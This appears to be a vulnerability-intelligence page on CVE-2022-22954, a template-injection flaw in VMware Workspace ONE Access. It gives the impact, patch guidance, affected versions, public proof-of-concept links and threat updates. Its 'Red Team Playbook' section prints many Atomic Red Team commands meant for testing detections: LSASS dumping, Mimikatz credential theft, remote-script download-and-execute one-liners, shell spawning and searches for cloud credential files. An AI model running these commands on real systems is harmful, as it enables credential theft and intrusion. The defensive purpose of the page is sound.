CVE-2022-22954
Overview
This vulnerability is a server-side template injection affecting VMware Workspace ONE Access and Identity Manager components. The root cause lies in improper sanitization of user-supplied input within server-side templates, allowing malicious input to be interpreted as executable code. This flaw resides in the template rendering engine used by the affected versions, enabling injection of arbitrary code during template processing.
Vulnerability Description
VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.
Impact
An attacker can execute arbitrary commands on the affected system remotely without authentication or user interaction, gaining full control over the server hosting VMware Workspace ONE Access or Identity Manager. This enables compromise of confidentiality, integrity, and availability of sensitive data and services, potentially leading to full system takeover, lateral movement within the network, and disruption of enterprise identity management infrastructure.
Solution
VMware has released security updates addressing this vulnerability in advisory VMSA-2022-0011. Affected customers should upgrade VMware Workspace ONE Access and Identity Manager to versions 3.3.7 or later, and vRealize Automation to versions beyond 7.6 as specified in the advisory. Detailed patching instructions and mitigation guidance are available at https://www.vmware.com/security/advisories/VMSA-2022-0011.html. No alternative workarounds are recommended by the vendor.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability present in VMware Workspace ONE Access and Identity Manager arises from a server-side template injection flaw, which allows an attacker to execute arbitrary code on the server. This vulnerability is particularly critical due to its high CVSS score, indicating a severe risk level. The root cause lies in the improper handling of user input within template rendering processes. When an attacker crafts a malicious input that is processed by the server, it can lead to the execution of unintended commands or scripts, effectively compromising the server's integrity and security. The affected versions of the identity management and access products are widely used in enterprise environments, making this vulnerability a significant concern for organizations relying on these solutions for identity and access management.
Attack vectors for this vulnerability are primarily network-based, requiring only that the attacker has access to the affected network. An attacker could exploit this flaw by sending specially crafted requests to the server, which would then process the input as part of its template rendering logic. This could be done through various means, such as phishing attacks, social engineering, or direct network access. Once the attacker successfully injects the payload, they could execute arbitrary code, potentially leading to unauthorized access to sensitive data, manipulation of system configurations, or deployment of malware within the network. The simplicity of the attack method, combined with the potential for significant damage, underscores the urgency for organizations to address this vulnerability.
The real-world impact of this vulnerability is profound, particularly for organizations that utilize VMware's identity management solutions. Successful exploitation could lead to unauthorized access to critical systems and data, resulting in data breaches, loss of customer trust, and significant financial repercussions. The ability to execute arbitrary code on the server means that attackers could not only steal sensitive information but also pivot to other systems within the network, escalating their access and control. This could disrupt business operations, lead to compliance violations, and incur costs related to incident response and recovery efforts. As organizations increasingly rely on digital infrastructure, the implications of such vulnerabilities extend beyond immediate financial losses to long-term reputational damage and potential legal liabilities.
To detect and mitigate the risks associated with this vulnerability, organizations should adopt a multi-faceted approach. Regular vulnerability assessments and penetration testing can help identify weaknesses in their systems before they can be exploited. Implementing robust input validation and sanitization measures is essential to prevent malicious payloads from being processed by the server. Additionally, organizations should ensure that they are running the latest versions of affected products, as vendors often release patches to address known vulnerabilities. Network segmentation and strict access controls can also limit the potential impact of an exploit by reducing the attack surface and restricting access to sensitive systems.
In conclusion, the server-side template injection vulnerability in VMware's identity management and access solutions poses a significant risk to organizations that utilize these products. The potential for remote code execution highlights the need for immediate attention and action from cybersecurity teams. By understanding the technical details, attack vectors, and real-world implications of this vulnerability, organizations can better prepare themselves to defend against such threats. Proactive detection and mitigation strategies, combined with a culture of security awareness, will be crucial in safeguarding against the exploitation of this and similar vulnerabilities in the future.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2022-22954, evidenced by a new detection after a period of dormancy. This resurgence coincides with the emergence of multiple new proof-of-concept exploits publicly available on code-sharing platforms, which facilitate automated scanning and remote code execution against vulnerable VMware Workspace ONE Access and Identity Manager instances. The availability of these tools lowers the barrier for threat actors, increasing the likelihood of opportunistic attacks. Notably, ransomware groups such as Akira and UNC3886 remain associated with campaigns leveraging this vulnerability, underscoring its continued appeal in ransomware operations. Although the Exploit Prediction Scoring System (EPSS) score remains high but stable, the sudden uptick in active exploitation attempts elevates the immediate threat level. Defenders should recognize that the vulnerability is transitioning from theoretical risk to active exploitation, signaling a heightened operational risk environment for organizations relying on affected VMware products.
Update 2 — June 23, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2022-22954, with telemetry indicating a doubling in observed activity. This surge coincides with a near-perfect EPSS score, reflecting an elevated likelihood of successful exploitation in the wild. The persistence of ransomware groups such as Akira and UNC3886 leveraging this vulnerability underscores its continued operational value for threat actors. The availability of multiple new proof-of-concept exploits further lowers the barrier for adversaries to weaponize this flaw, increasing the risk of widespread compromise. Collectively, these developments signify a transition from opportunistic scanning to more concerted exploitation efforts, raising the immediate threat level for organizations running affected VMware Workspace ONE Access and Identity Manager deployments.
Update 3 — July 08, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2022-22954, reflected by a discernible uptick in telemetry signals. This increase coincides with the continued proliferation of publicly available proof-of-concept exploits, which have diversified in complexity and functionality, enabling adversaries to conduct more efficient and automated attacks. The sustained interest from ransomware groups such as Akira and UNC3886 further amplifies the operational risk, as these actors integrate the vulnerability into their attack chains with greater frequency. Collectively, these developments signify a shift toward more aggressive and persistent exploitation campaigns, elevating the threat level for organizations utilizing VMware Workspace ONE Access and Identity Manager. Defenders should interpret this trend as indicative of an expanding attack surface and heightened likelihood of successful compromise attempts.
Affected Products (11)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vmware | Identity Manager | 3.3.3 |
cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:*
|
|
|
Vmware | Identity Manager | 3.3.4 |
cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*
|
|
|
Vmware | Identity Manager | 3.3.5 |
cpe:2.3:a:vmware:identity_manager:3.3.5:*:*:*:*:*:*:*
|
|
|
Vmware | Identity Manager | 3.3.6 |
cpe:2.3:a:vmware:identity_manager:3.3.6:*:*:*:*:*:*:*
|
|
|
Vmware | Vrealize Automation | 7.6 |
cpe:2.3:a:vmware:vrealize_automation:7.6:*:*:*:*:*:*:*
|
|
|
Vmware | Workspace One Access | 20.10.0.0 |
cpe:2.3:a:vmware:workspace_one_access:20.10.0.0:*:*:*:*:*:*:*
|
|
|
Vmware | Workspace One Access | 20.10.0.1 |
cpe:2.3:a:vmware:workspace_one_access:20.10.0.1:*:*:*:*:*:*:*
|
|
|
Vmware | Workspace One Access | 21.08.0.0 |
cpe:2.3:a:vmware:workspace_one_access:21.08.0.0:*:*:*:*:*:*:*
|
|
|
Vmware | Workspace One Access | 21.08.0.1 |
cpe:2.3:a:vmware:workspace_one_access:21.08.0.1:*:*:*:*:*:*:*
|
|
|
Vmware | Cloud Foundation | All |
cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
|
|
|
Vmware | Vrealize Suite Lifecycle Manager | All |
cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
VMware Workspace ONE Access CVE-2022-22954
exploits/linux/http/vmware_workspace_one_access_cve_2022_22954
|
mr_me, Udhaya Prakash, wvu | Unknown | - | View |
GitHub PoCs (27)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Schira4396/VcenterKiller
一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972/31656以...
|
Schira4396 | 1476 | 166 | 2022-10-04 | View |
|
sherlocksecurity/VMware-CVE-2022-22954
POC for VMWARE CVE-2022-22954
|
sherlocksecurity | 279 | 44 | 2022-04-11 | View |
|
bewhale/CVE-2022-22954
CVE-2022-22954 VMware Workspace ONE Access freemarker SSTI 漏洞 命令执行、批量检测脚本、文件写入
|
bewhale | 68 | 19 | 2022-04-13 | View |
|
tunelko/CVE-2022-22954-PoC
VMware Workspace ONE Access and Identity Manager RCE via SSTI - Test script for shodan, file or manual.
|
tunelko | 16 | 2 | 2022-04-13 | View |
|
jax7sec/CVE-2022-22954
提供批量扫描URL以及执行命令功能。Workspace ONE Access 模板注入漏洞,可执行任意代码
|
jax7sec | 12 | 4 | 2022-04-12 | View |
|
orwagodfather/CVE-2022-22954
|
orwagodfather | 8 | 8 | 2022-06-03 | View |
|
Vulnmachines/VMWare_CVE-2022-22954
CVE-2022-22954 is a server-side template injection vulnerability in the VMware Workspace ONE Access and Identity Manager
|
Vulnmachines | 11 | 2 | 2022-04-11 | View |
|
DrorDvash/CVE-2022-22954_VMware_PoC
PoC for CVE-2022-22954 - VMware Workspace ONE Access Freemarker Server-Side Template Injection
|
DrorDvash | 10 | 1 | 2022-04-12 | View |
|
MLX15/CVE-2022-22954
CVE-2022-22954 VMware Workspace ONE Access free marker SSTI
|
MLX15 | 4 | 6 | 2022-04-15 | View |
|
secfb/CVE-2022-22954
Python script to exploit CVE-2022-22954 and then exploit CVE-2022-22960
|
secfb | 0 | 10 | 2022-06-01 | View |
|
bb33bb/CVE-2022-22954-VMware-RCE
CVE-2022-22954-VMware-RCE批量检测POC
|
bb33bb | 2 | 5 | 2022-04-12 | View |
|
b4dboy17/CVE-2022-22954
VMware Workspace ONE Access and Identity Manager RCE via SSTI. CVE-2022-22954 - PoC SSTI * exploit+payload+shodan (ну на...
|
b4dboy17 | 5 | 2 | 2022-06-03 | View |
|
aniqfakhrul/CVE-2022-22954
|
aniqfakhrul | 4 | 2 | 2022-04-11 | View |
|
Chocapikk/CVE-2022-22954
Python script to exploit CVE-2022-22954 and then exploit CVE-2022-22960
|
Chocapikk | 4 | 1 | 2022-06-01 | View |
|
corelight/cve-2022-22954
|
corelight | 1 | 2 | 2022-04-12 | View |
|
mumu2020629/-CVE-2022-22954-scanner
|
mumu2020629 | 1 | 2 | 2022-04-12 | View |
|
axingde/CVE-2022-22954-POC
提供单个或批量URL扫描是否存在CVE-2022-22954功能
|
axingde | 2 | 1 | 2020-10-09 | View |
|
emilyastranova/VMware-CVE-2022-22954-Command-Injector
Proof of Concept for exploiting VMware CVE-2022-22954
|
emilyastranova | 1 | 1 | 2022-04-14 | View |
|
lucksec/VMware-CVE-2022-22954
|
lucksec | 0 | 2 | 2022-04-12 | View |
|
MSeymenD/CVE-2022-22954-Testi
CVE-2022-22954 Açığı test etme
|
MSeymenD | 1 | 0 | 2022-04-12 | View |
|
amit-pathak009/CVE-2022-22954
|
amit-pathak009 | 0 | 1 | 2022-08-13 | View |
|
mhurts/CVE-2022-22954-POC
|
mhurts | 0 | 1 | 2022-04-16 | View |
|
nieldk/VMware-CVE-2022-22954
|
nieldk | 0 | 0 | 2026-07-08 | View |
|
Jun-5heng/CVE-2022-22954
VMware Workspace ONE Access远程代码执行漏洞 / Code By:Jun_sheng
|
Jun-5heng | 0 | 0 | 2022-04-13 | View |
|
arzuozkan/CVE-2022-22954
Practising technical writing with researching CVE-2022-22954 VMware Workspace ONE Access RCE vulnerability.
|
arzuozkan | 0 | 0 | 2022-06-11 | View |
|
nguyenv1nK/CVE-2022-22954
CVE-2022-22954 analyst
|
nguyenv1nK | 0 | 0 | 2022-05-05 | View |
|
amit-pathak009/CVE-2022-22954-PoC
|
amit-pathak009 | 0 | 0 | 2022-08-13 | View |
Threat Feed
12 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
